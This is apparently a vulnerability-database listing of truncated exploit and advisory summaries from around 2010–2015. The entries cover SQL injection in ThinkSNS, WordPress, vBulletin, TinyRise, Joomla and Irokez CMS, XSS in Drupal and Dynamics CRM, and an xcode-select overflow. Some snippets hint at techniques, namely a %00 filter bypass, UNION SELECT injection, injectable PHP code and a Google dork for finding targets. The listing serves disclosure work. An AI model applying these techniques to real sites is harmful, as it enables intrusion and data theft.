ThinkSNS 防御绕过思路(union select 真正的无限制sql注射)

简要描述： ThinkSNS 防御绕过思路union select 真正的无限制sql注射 详细说明： 经过我们的分析%00可以全局绕过： public function shareFeed // 获取传入的值 $post = $POST; // 安全过滤 foreach$post as $key = $val $post$key = t$post$key; // 过滤内容值 $post'body' = filterkeyword$post'body'; // 判断资源是否删除 ifempty$post'curid' $map'feedid' = $post'sid'; else...

WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection

. Exploit Title: WordPress: Webdorado Spider Event Calendar = 1.4.9 SQL Injection Date: 2015-02-12 Exploit Author: Mateusz Lach Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip...

vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection

vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection Exploit Title: vBulletin vBSSO Single Sign-On – = 1.4.15 This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file in the fetchUserinfo function. It requires a big UNION ALL SELECT query and commenting out the LIMIT function of...

Microsoft Dynamics CRM Cross-Site Scripting Vulnerability

Microsoft Dynamics CRM is a fully integrated customer relationship management CRM system. A cross-site scripting vulnerability exists in Microsoft Dynamics CRM 2013 SP1. Because the script passed to "/Biz/Users/AddUsers/SelectUsersPage.aspx" fails to adequately filter user-supplied input, a remot...

DEBIAN-CVE-2014-8101

The RandR extension in XFree86 4.2.0, X.Org X Window System aka X11 or X X11R6.7, and X.Org Server aka xserver and xorg-server before 1.16.3 allows remote authenticated users to cause a denial of service out-of-bounds read or write or possibly execute arbitrary code via a crafted length or index...

THC-SmartBrute - Finds undocumented and secret commands implemented in a smartcard

This tool finds undocumented and secret commands implemented in a smartcard. An instruction is divided into Class CLA, Instruction-Number INS and the parameters or arguments P1, P2, P3. THC-SMARTBRUTE iterates through all the possible values of CLA and INS to find a valid combination. Furthermore...

CVE-2014-9346

Multiple cross-site scripting XSS vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the 1 taxonomy term title for instances with Save term...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the 1 taxonomy term title for instances with Save term...

CVE-2014-9346

The CVE records multiple XSS vulnerabilities in the Drupal Hierarchical Select module (6.x-3.x) prior to 6.x-3.9. The issues allow remote authenticated users with certain permissions to inject arbitrary script/HTML via (1) taxonomy term title when Save term lineage is enabled and (2) entity type ...

CVE-2014-9346

Multiple cross-site scripting XSS vulnerabilities in the Hierarchical Select module 6.x-3.x before 6.x-3.9 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via vectors related to the 1 taxonomy term title for instances with Save term...

SA-CONTRIB-2014-117 - Hierarchical Select - Cross Site Scripting (XSS)

The Hierarchical Select module provides a "hierarchicalselect" form element, which is a greatly enhanced way for letting the user select items in a taxonomy. The module does not sanitize some of the user-supplied data before displaying it, leading to two Cross Site Scripting XSS vulnerabilities...

Snowfox CMS 1.0 Open Redirect

Snowfox CMS v1.0 rd param Open Redirect Vulnerability Vendor: Globiz Solutions Product web page: http://www.snowfoxcms.org Affected version: 1.0 Summary: Snowfox is an open source Content Management System CMS that allows your website users to create and share content based on permission...

IBM DB2 9.7 < Fix Pack 10 Multiple Vulnerabilities

According to its version, the installation of IBM DB2 9.7 running on the remote host is affected by the following vulnerabilities : - An input-validation error exists related to handling the 'ALTER MODULE' statement that allows buffer overflows. CVE-2014-3094 - An error exists related to handling...

UBUNTU-CVE-2014-7207

A certain Debian patch to the IPv6 implementation in the Linux kernel 3.2.x through 3.2.63 does not properly validate arguments in ipv6selectident function calls, which allows local users to cause a denial of service NULL pointer dereference and system crash by leveraging 1 tun or 2 macvtap devic...

TinyRise 邮件欺诈可重置任何人密码和后台sql注射

简要描述： TinyRise 邮件欺诈可重置任何人密码和后台sql注射 详细说明： simple.php: public function forgetact $email = Filter::sqlReq::args'email'; $model = $this-model-table'user'; $obj = $model-where"email = '".$email."'"-find; if!empty$obj $model = $this-model-table'resetpassword'; $obj = $model-where"email =...

xcode-select 13.4.0 Buffer Overflow

Exploit Title: xcode-select - buffer overflow Description: xcode-select controls the location of the developer directory used by xcrun1, xcodebuild1, cc1, and other Xcode and BSD development tools. Date: Tuesday 23 2014 Exploit Author: Juan Sacco Vendor Homepage: https://developer.apple.com...

IBM DB2 10.5 < Fix Pack 4 Multiple Vulnerabilities

According to its version, the installation of IBM DB2 10.5 running on the remote host is affected by the following vulnerabilities : - An error exists related to JavaScript Object Notation JSON-C handling, string parsing, and the hash function that allows denial of service attacks. CVE-2013-6371 ...

Code injection

The SQL engine in IBM DB2 9.5 through FP10, 9.7 through FP9a, 9.8 through FP5, 10.1 through FP4, and 10.5 before FP4 on Linux, UNIX, and Windows allows remote authenticated users to cause a denial of service daemon crash via a crafted UNION clause in a subquery of a SELECT statement...

Joomla Component (com_equipment) SQL Injection Vulnerability

No description provided by source. Exploit Title : Joomla comequipment Sql Injection Vulnerability Date : 16 - 8 - 2010 Author : Forza-Dz Vendor : http://joomlaequipment.com/ Version : All Versions Tested on : Win Sp2 and Mac Dork = inurl:comequipment --- SQL Injection Vulenrability --- SQL...

Irokez CMS 0.7.1 - Remote SQL Injection Vulnerability

No description provided by source. +--------------------------------------------------------------------------------------------------------------------+ +--------------------------------------------Irokez 0.7.1 SQL inlection--------------------------------------------+...